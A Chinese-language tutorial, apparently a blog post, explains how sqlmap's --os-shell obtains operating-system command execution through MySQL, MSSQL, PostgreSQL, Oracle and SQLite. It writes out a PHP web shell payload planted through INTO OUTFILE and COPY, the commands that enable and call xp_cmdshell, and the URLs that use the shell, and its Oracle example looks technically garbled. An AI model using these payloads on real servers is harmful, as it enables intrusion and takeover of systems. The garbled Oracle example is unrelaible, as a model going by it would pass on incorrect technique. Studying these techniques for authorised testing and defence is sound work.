sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)
1. MySQL
条件
- 数据库用户需要具备高权限(如
FILE权限)。 - 数据库服务运行用户需要对目标目录有写权限。
- Web 服务器有可写目录,且支持执行上传的脚本(如 PHP、JSP 等)。
原理
- 利用 MySQL 的
SELECT ... INTO OUTFILE功能,将恶意代码写入目标 Web 目录,生成一个 Web Shell 文件。 - 攻击者通过浏览器访问 Web Shell,获得命令执行能力。
流程
- 确认
FILE权限:SELECT * FROM mysql.user WHERE User='target_user'; - 写入 Web Shell 到目标目录:
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; - 通过浏览器访问 Web Shell 执行命令:
http://xxxxxx.com/shell.php?cmd=whoami
2. Microsoft SQL Server (MSSQL)
条件
- 数据库用户需要
sysadmin权限。 - 目标服务器启用了扩展存储过程
xp_cmdshell。 - 数据库运行用户有命令执行权限。
原理
- 调用 MSSQL 的
xp_cmdshell存储过程,直接在操作系统中执行命令。
流程
- 确认是否启用了
xp_cmdshell:EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; - 利用
xp_cmdshell执行命令:EXEC xp_cmdshell 'whoami'; - 通过命令的输出或回显获取执行结果。
3. PostgreSQL
条件
- 数据库用户需要对文件系统具有写权限。
- 数据库支持使用
COPY命令将数据写入文件。 - 目标 Web 目录可写入文件,并允许脚本执行。
原理
- 利用 PostgreSQL 的
COPY功能,将 Web Shell 写入目标文件系统。
流程
- 写入 Web Shell:
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php'; - 访问 Web Shell:
http://xxxxx.com/shell.php?cmd=id
4. Oracle
条件
- 数据库用户需要
CREATE LIBRARY权限。 - 数据库运行用户需要访问操作系统。
- 利用外部过程或 Java 存储过程。
原理
- 通过 Oracle 数据库的外部过程,调用操作系统命令。
- 使用 Java 存储过程执行系统级操作。
流程
- 创建外部库(如 DLL 文件):
CREATE OR REPLACE LIBRARY mylib AS '/path/to/external/file'; - 调用外部过程执行命令:
DECLAREcmd VARCHAR2(1000); BEGINcmd := 'ls';DBMS_SCHEDULER.CREATE_JOB(cmd); END; - 读取命令执行结果。
5. SQLite
条件
- SQLite 本身无法直接与操作系统交互。
- 必须结合其他漏洞(如本地文件包含)实现 Web Shell。
原理
- 利用 SQLite 的
ATTACH或其他功能,尝试将恶意数据写入特定目录。
流程
- 写入数据:
ATTACH DATABASE '/var/www/html/shell.php' AS shell; - 在 Web 服务器中访问生成的 Web Shell 文件。
总结表
| 数据库 | 条件 | 原理 | 流程简述 |
|---|---|---|---|
| MySQL | FILE 权限,Web 目录可写 | 写入 Web Shell 通过 SELECT ... INTO OUTFILE | 写 Shell -> 访问 Shell -> 执行命令 |
| MSSQL | sysadmin 权限,启用 xp_cmdshell | 使用 xp_cmdshell 直接执行系统命令 | 开启 xp_cmdshell -> 执行命令 |
| PostgreSQL | 写权限,Web 目录可访问 | 使用 COPY 写入 Web Shell | 写 Shell -> 访问 Shell -> 执行命令 |
| Oracle | CREATE LIBRARY 权限,系统访问权限 | 使用外部库或 Java 存储过程调用系统命令 | 配置库 -> 调用命令 |
| SQLite | 结合其他漏洞(如文件包含) | 写入恶意数据文件,结合其他漏洞(如 LFI)访问 | 写 Shell -> 结合 LFI 执行 |
相关文章:
)
sqlmap --os-shell的原理(MySQL,MSSQL,PostgreSQL,Oracle,SQLite)
1. MySQL 条件 数据库用户需要具备高权限(如 FILE 权限)。数据库服务运行用户需要对目标目录有写权限。Web 服务器有可写目录,且支持执行上传的脚本(如 PHP、JSP 等)。 原理 利用 MySQL 的 SELECT ... INTO OUTFIL…...
2024年认证杯SPSSPRO杯数学建模C题(第一阶段)云中的海盐解题全过程文档及程序
2024年认证杯SPSSPRO杯数学建模 C题 云中的海盐 原题再现: 巴黎气候协定提出的目标是:在2100年前,把全球平均气温相对于工业革命以前的气温升幅控制在不超过2摄氏度的水平,并为1.5摄氏度而努力。但事实上,许多之前的…...
三维扫描检测在汽车制造中的应用
三维扫描,通过先进三维扫描技术获取产品和物体的形面三维数据,建立实物的三维图档,满足各种实物3D模型数据获取、三维数字化展示、3D多媒体开发、三维数字化存档、逆向设计、产品开发、直接3D打印制造或辅助加工制造等一系列的应用。 三维扫描…...
【NoSQL数据库】Hbase基本操作——数据库表的增删改查
目录 一、Hbase原理 二、HBase数据库操作 三、遇到的问题和解决方法 一、Hbase原理 HBase的数据模型: 行键 时间戳 列族:contents 列族:anchor 列族:mime “com.cnn.www” T9 Achor:cnnsi.com”CNN” T8 Achor:…...
【C++】格式化输出详解:掌握 cout 的进阶用法
博客主页: [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: C 文章目录 💯前言💯格式化输出的理论概述💯控制输出宽度和填充字符setw 操作符setfill 操作符 💯控制浮点数的显示格式fixed 与 scientificsetprecision 💯…...
设计模式学习思路二
设计模式的学习思路_设计模式必须按顺序进行吗-CSDN博客 以下是一些方法和思路可以帮助你更清晰地识别使用了哪种设计模式。 1. 确定模式时的思考步骤 以下是分析代码时,你可以遵循的一些思路和步骤,帮助你识别可能使用的设计模式: a. 识别…...
什么是等级保护
1.为什么要实施等级保护: •国家信息安全形势严峻(敌对势力),针对基础信息系统的违法犯罪持续上升(网上诈骗、入侵、网上盗窃) •维护国家安全的需求(基础信息网络【互联网、电信网、广电网】及重要信息系统【银行、铁路、电力、海关】已经成为国家的关键基础设施) •信息安全是…...
k8s api对象,CRD
在Kubernetes项目中,一个API对象在Etcd里的完整资源路径,是由:Group(API组)、Version(API版本)和Resource(API资源类型)三个部分组成 apiVersion: batch/v2alpha1 kind:…...
【C++指南】C++内存管理 深度解析
💓 博客主页:倔强的石头的CSDN主页 📝Gitee主页:倔强的石头的gitee主页 ⏩ 文章专栏:《C指南》 期待您的关注 目录 引言 一、C 内存管理概述 二、C内存区域划分 三、C 内存管理方式 🍃1.自动内存管理…...
C++小碗菜之二:软件单元测试
“没有测试的代码重构不能称之为重构,它仅仅是垃圾代码的到处移动” ——Corey Haines 目录 前言 什么是单元测试? 单元测试的组成 单元测试的命名 单元测试的独立性 Google Test 单元测试的环境配置与使用 1. Ubuntu下安装 Google Test 2. 编写…...
PyCharm+Selenium+Pytest配置小记
1、下载ChromeDriver: Chrome130以后的Driver下载: Chrome for Testing availabilityhttps://googlechromelabs.github.io/chrome-for-testing/ (1)查看自己Crome浏览器的版本:设置-->关于 Chrome; &…...
摩尔线程 国产显卡 MUSA 并行编程 学习笔记-2024/12/04
Learning Roadmap: Section 1: Intro to Parallel Programming & MUSA Deep Learning Ecosystem(摩尔线程 国产显卡 MUSA 并行编程 学习笔记-2024/11/30-CSDN博客)UbuntuDriverToolkitcondapytorchtorch_musa环境安装(2024/11/24-Ubunt…...
【FAQ】HarmonyOS SDK 闭源开放能力 —Remote Communication Kit
1.问题描述: DynamicDnsRule有没有示例?这个地址是怎么解析出来 https://developer.huawei.com/consumer/cn/doc/harmonyos-references/remote-communication-rcp-0000001770911890#section8160554134811 解决方案: ‘DynamicDnsRule’&a…...
【日常记录-Mybatis】PageHelper导致语句截断
1. 简介 PageHelper是Mybatis-Plus中的一个插件,主要用于实现数据库的分页查询功能。其核心原理是将传入的页码和条数赋值给一个Page对象,并保存到本地线程ThreadLocal中,接下来,PageHelper会进入Mybatis的拦截器环节,…...
随时随地掌控数据:如何使用手机APP远程访问飞牛云NAS
💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…...
JVM 类加载器有哪些?双亲委派机制的作用是什么?如何自定义类加载器?
类加载器分类 大家好,我是码哥,可以叫我靓仔,《Redis 高手心法》畅销书作者。 先回顾下,在 Java 中,类的初始化分为几个阶段: 加载、链接(包括验证、准备和解析)和 初始化。 而 类加载器&#x…...
从基态到激发态再到里德伯态的双光子激发过程
铯原子(Cs)从基态6S1/2到激发态6P3/2再到里德伯态44D5/2的双光子激发过程, 并通过数值计算和图形化展示来研究不同失谐条件下的拉比频率、AC Stark位移差以及散射概率的变化 结果显示,在给定的实验参数下,拉比频率较低…...
Clickhouse 外部存储引擎
文章目录 外部存储引擎分类MySQL引擎PostgreSQL引擎MongoDB引擎JDBC引擎ODBC引擎Kafka引擎RabbitMQ引擎File引擎URL引擎HDFS引擎 外部存储引擎分类 引擎类型描述特点MySQL从 MySQL 数据库中读取数据用于与 MySQL 数据库共享数据,支持读取 MySQL 表中的数据 支持 SQ…...
eclipse怎么配置jdk路径?
在Eclipse中配置JDK路径是一个简单的步骤,以下是配置JDK路径的步骤: 打开Eclipse:启动Eclipse IDE。 访问首选项: 在Eclipse的菜单栏中,选择 Window > Preferences(对于Mac OS X用户,选择 E…...
【前端】JavaScript 中的创建对象模式要点
博客主页: [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: 前端 文章目录 💯前言💯对象属性值中的引号规则💯对象属性换行与尾随逗号的使用💯工厂模式:灵活高效的对象创建💯自定义构造函数:通过…...
突破文档获取限制:kill-doc开源工具全方位解析
突破文档获取限制:kill-doc开源工具全方位解析 【免费下载链接】kill-doc 看到经常有小伙伴们需要下载一些免费文档,但是相关网站浏览体验不好各种广告,各种登录验证,需要很多步骤才能下载文档,该脚本就是为了解决您的…...
qmcdump:QQ音乐加密文件解码的跨平台解决方案指南
qmcdump:QQ音乐加密文件解码的跨平台解决方案指南 【免费下载链接】qmcdump 一个简单的QQ音乐解码(qmcflac/qmc0/qmc3 转 flac/mp3),仅为个人学习参考用。 项目地址: https://gitcode.com/gh_mirrors/qm/qmcdump 问题引入&…...
5步打造清爽右键菜单:ContextMenuManager开源工具完全指南
5步打造清爽右键菜单:ContextMenuManager开源工具完全指南 【免费下载链接】ContextMenuManager 🖱️ 纯粹的Windows右键菜单管理程序 项目地址: https://gitcode.com/gh_mirrors/co/ContextMenuManager 当你在Windows系统中右键点击文件时&#…...
忍者像素绘卷惊艳效果展示:鸣人螺旋丸像素绘卷作品集
忍者像素绘卷惊艳效果展示:鸣人螺旋丸像素绘卷作品集 1. 像素艺术新纪元:忍者世界的视觉革命 当传统漫画遇上16-bit复古美学,忍者像素绘卷为我们打开了一扇通往全新视觉体验的大门。这款基于Z-Image-Turbo深度优化的图像生成工作站…...
YOLO X Layout快速部署:Docker一键启动,开箱即用
YOLO X Layout快速部署:Docker一键启动,开箱即用 1. 简介与核心价值 你是否经常需要处理大量文档图片,却苦于手动标注各种元素区域?YOLO X Layout正是为解决这个问题而生的智能工具。它能自动识别文档中的文本、表格、图片、标题…...
ChatTTS语音合成生产环境部署:负载均衡+API服务化封装实践
ChatTTS语音合成生产环境部署:负载均衡API服务化封装实践 1. 项目背景与价值 ChatTTS是目前开源领域最逼真的中文语音合成模型之一,专门针对对话场景进行了深度优化。与传统的TTS系统不同,ChatTTS能够自动生成极其自然的停顿、换气声、笑声…...
——跨平台网盘挂载神器,安卓设备轻松管理云端文件)
AListFlutter(手机alist)——跨平台网盘挂载神器,安卓设备轻松管理云端文件
1. 为什么你需要AListFlutter? 作为一个经常需要在不同设备间切换办公的现代人,我深刻理解手机存储空间不足的痛苦。每次想用手机看个电影,都要先删掉几个APP;想拍个视频,又得清理微信缓存。直到发现了AListFlutter这个…...
零基础玩转AutoGLM-Phone-9B:图文语音多模态AI,5分钟快速部署指南
零基础玩转AutoGLM-Phone-9B:图文语音多模态AI,5分钟快速部署指南 1. AutoGLM-Phone-9B简介 1.1 什么是AutoGLM-Phone-9B AutoGLM-Phone-9B是一款专为移动设备优化的多模态AI模型,它能同时处理文字、图片和语音三种信息。想象一下…...
简单三步:部署Qwen3-ForcedAligner,实现音频转字幕的自动化流程
简单三步:部署Qwen3-ForcedAligner,实现音频转字幕的自动化流程 1. 工具核心价值与工作原理 1.1 为什么需要本地字幕生成工具 在视频创作和会议记录场景中,手动添加字幕既耗时又费力。传统在线字幕服务存在隐私泄露风险,且通常…...
Unity性能优化终极利器:MeshFusion Pro
在现代游戏开发中,性能优化始终是一个核心问题。尤其是在大型场景或高复杂度模型的项目中,Draw Call 过多、顶点数量庞大以及实时生成对象都会严重拖慢游戏帧率,影响用户体验。为了应对这些挑战,Unity 开发者社区中出现了大量优化…...